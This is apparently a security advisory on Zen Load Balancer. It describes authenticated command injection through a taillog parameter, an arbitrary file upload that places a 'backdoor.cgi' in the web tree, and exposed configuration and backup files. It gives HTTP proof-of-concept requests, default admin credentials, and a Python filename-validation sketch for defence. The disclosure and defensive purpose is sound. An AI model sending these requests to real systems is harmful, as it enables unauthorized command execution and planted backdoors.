### Critical Vulnerability Information

#### 1. Arbitrary Command Execution (Requires Authentication)

- **Affected Versions**: v2.0 and v3.0-rc1
- **Vulnerability Description**: Attackers can execute arbitrary commands via the `taillog` parameter in the `content2.cgi` file after authentication.
- **PoC**:

```http
GET /index.cgi?sid=2&zlbtag=modules%3D2%3BMOD%3D1%3A44444... e%3Bzlbash%3Dtaillog%20Action%3DSetLog%20HTTP/1.1
Host: zenloadbalancer-host
Authorization: Basic YWRtaW46QWRtaW4=
```

#### 2. Arbitrary File Upload (Requires Authentication)

- **Vulnerability Description**: The `upload.cgi` file allows uploading arbitrary files.
- **PoC**:

```http
POST /upload.cgi HTTP/1.1
Host: zenloadbalancer-host
Content-Type: multipart/form-data; boundary=---------------------------1178295032680
Content-Length: 905

-----------------------------1178295032680
Content-Disposition: form-data; name="file"; filename="./www/control/backdoor.cgi"
Content-type: application/octet-stream

#!/bin/sh
echo "Content-type: text/html"
echo ""
echo ""
echo "Hello World"
echo ""
-----------------------------1178295032680--
```

#### 3. Information Disclosure (No Authentication Required)

- **Vulnerability Description**: The `global.conf` file discloses full filesystem paths, internal network IP addresses, and software version. The `backup` directory may contain backups of web server configurations.
- **PoC**:

```text
https://zenloadbalancer-host-444/cgi-bin/global.conf
https://zenloadbalancer-host-444/backup/
```

#### References

- OWASP: Information Leakage
- OWASP: Code Injection
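
For finding 2, the sketch below shows one way an upload handler can confine the client-supplied `filename` before writing anything to disk. It is an added example, not code from the advisory or from the Zen Load Balancer project; `UPLOAD_ROOT`, `ALLOWED_EXT` and the function names are assumptions, and every sample header except the PoC's own is constructed.

```python
import os
import re
from email.message import Message

UPLOAD_ROOT = "/var/spool/uploads"       # assumed upload directory (hypothetical)
ALLOWED_EXT = {".pem", ".crt", ".tgz"}   # assumed extension allow-list (hypothetical)
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def filename_from_part(header_value):
    """Extract the filename parameter from a Content-Disposition header value."""
    msg = Message()
    msg["Content-Disposition"] = header_value
    return msg.get_filename()  # None when the parameter is absent


def safe_upload_path(header_value, root=UPLOAD_ROOT):
    """Return the confined destination path, or raise ValueError."""
    name = filename_from_part(header_value)
    if not name:
        raise ValueError("missing filename")
    # Reject directory components outright instead of silently stripping them.
    if "/" in name or "\\" in name or "\x00" in name:
        raise ValueError("directory component in filename")
    if not SAFE_NAME.fullmatch(name):
        raise ValueError("unexpected characters in filename")
    # Keep script types such as .cgi out of any web-served tree.
    if os.path.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # Defence in depth: the resolved path must still sit under the upload root.
    root_real = os.path.realpath(root)
    dest = os.path.realpath(os.path.join(root_real, name))
    if os.path.commonpath([dest, root_real]) != root_real:
        raise ValueError("destination escapes upload root")
    return dest


def validate(header_value):
    """Return (True, path) on success or (False, reason) on rejection."""
    try:
        return True, safe_upload_path(header_value)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    # First header is the one from the PoC above; the second is constructed.
    for hdr in ('form-data; name="file"; filename="./www/control/backdoor.cgi"',
                'form-data; name="file"; filename="cert.pem"'):
        print(hdr, "->", validate(hdr))
```

The upload directory should also sit outside the web root and be served without CGI execution, so a file that passes validation is never run by the web server.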